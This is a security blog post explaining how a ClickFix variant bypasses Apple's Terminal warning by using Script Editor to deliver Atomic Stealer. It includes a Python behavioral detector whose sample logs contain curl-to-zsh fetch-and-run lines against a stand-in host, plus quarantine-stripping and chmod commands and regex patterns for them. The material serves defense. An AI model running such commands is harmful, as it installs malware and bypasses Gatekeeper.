Brunswick, ME • (207) 245-1010 • contact@johnzblack.com
Apple shipped macOS 26.4 with a fix for ClickFix, the social engineering technique that tricks users into pasting commands into Terminal to deliver Atomic Stealer. The fix worked: a warning dialog now appears before suspicious Terminal activity runs.
Attackers took about 48 hours to find the workaround.
The new variant skips Terminal entirely and uses Script Editor, Apple’s IDE for AppleScript. No dialog. No scanning. When the user clicks “Execute” on the malicious page, the browser triggers the applescript:// URL scheme and hands off directly to Script Editor. From there, a curl-to-zsh pipe runs in memory, strips the Gatekeeper quarantine flag with xattr -c, and drops Atomic Stealer.
Old version: open Terminal, paste, hit Enter. New version: one click.
The structural problem is that app-specific mitigations don’t actually solve the underlying behavior. Terminal was flagged. Script Editor wasn’t. There’s a long list of macOS applications that can execute code or trigger system commands. You can’t patch each one in isolation and call it done.
Behavioral detection is more durable. A curl-to-zsh pipe that downloads a binary, strips Gatekeeper flags, and makes it executable is suspicious regardless of what launched it. That’s the signal worth watching, not which app it came from.
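As an added illustration of the behavioral approach (example code written for this post, not Apple's or the original article's): the detector below groups constructed process-exec telemetry by session and flags the download / quarantine-strip / chmod chain whether Terminal or Script Editor launched it. The log format, field names and regexes are assumptions, not a real EDR schema.

```python
import re
from collections import defaultdict

# Constructed telemetry (not real captures): one process-exec event per line,
# fields: timestamp|session|parent_app|command_line
SAMPLE_EVENTS = """\
2024-01-01T10:00:01|s1|Terminal|/bin/zsh -c "curl -fsSL https://example.invalid/a.sh | zsh"
2024-01-01T10:00:02|s1|zsh|/usr/bin/xattr -c /tmp/upd
2024-01-01T10:00:02|s1|zsh|/bin/chmod +x /tmp/upd
2024-01-01T10:05:00|s2|Script Editor|/bin/zsh -c "curl -fsSL https://example.invalid/b.sh | zsh"
2024-01-01T10:05:01|s2|zsh|/usr/bin/xattr -c /tmp/upd2
2024-01-01T10:05:01|s2|zsh|/bin/chmod +x /tmp/upd2
2024-01-01T11:00:00|s3|Terminal|/usr/bin/curl -o report.pdf https://example.invalid/r.pdf
2024-01-01T11:30:00|s4|Terminal|/usr/bin/xattr -c ~/Downloads/notes.txt
"""

# Stages of the chain described above; each is matched on the command line
# only, so the parent application never enters the decision.
INDICATORS = {
    "curl_to_shell": re.compile(r"\bcurl\b.*\|\s*(zsh|bash|sh)\b"),
    "quarantine_strip": re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "make_executable": re.compile(r"\bchmod\s+(\S*\+x|[0-7]*7[0-7]*)\b"),
}


def parse_events(text):
    """Parse the assumed pipe-delimited format; maxsplit keeps pipes inside the command."""
    events = []
    for line in text.strip().splitlines():
        ts, session, parent, cmd = line.split("|", 3)
        events.append({"ts": ts, "session": session, "parent": parent, "cmd": cmd})
    return events


def detect_clickfix_chains(events, min_indicators=2):
    """Flag any session in which at least `min_indicators` distinct stages appear.

    A lone curl download (s3) or a lone xattr -c on a text file (s4) is normal
    user activity and stays below the threshold; the combination is the signal."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[ev["session"]].append(ev)
    findings = []
    for session, evs in by_session.items():
        hits = {name for ev in evs for name, rx in INDICATORS.items() if rx.search(ev["cmd"])}
        if len(hits) >= min_indicators:
            findings.append({"session": session, "launched_by": evs[0]["parent"], "stages": sorted(hits)})
    return findings


if __name__ == "__main__":
    for finding in detect_clickfix_chains(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

Both the Terminal session and the Script Editor session are reported with all three stages, while the two benign sessions are not.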
A second malicious litellm package on PyPI drives the same point home. It uses a .pth file that executes on every Python startup, with no import required. Security tools that scan for suspicious imports miss it completely. Same logic: the obvious path was watched, so attackers used the one that wasn’t.
Apple hasn’t patched Script Editor as of publication.
The full breakdown of how the new attack chain works and why the fix didn’t stick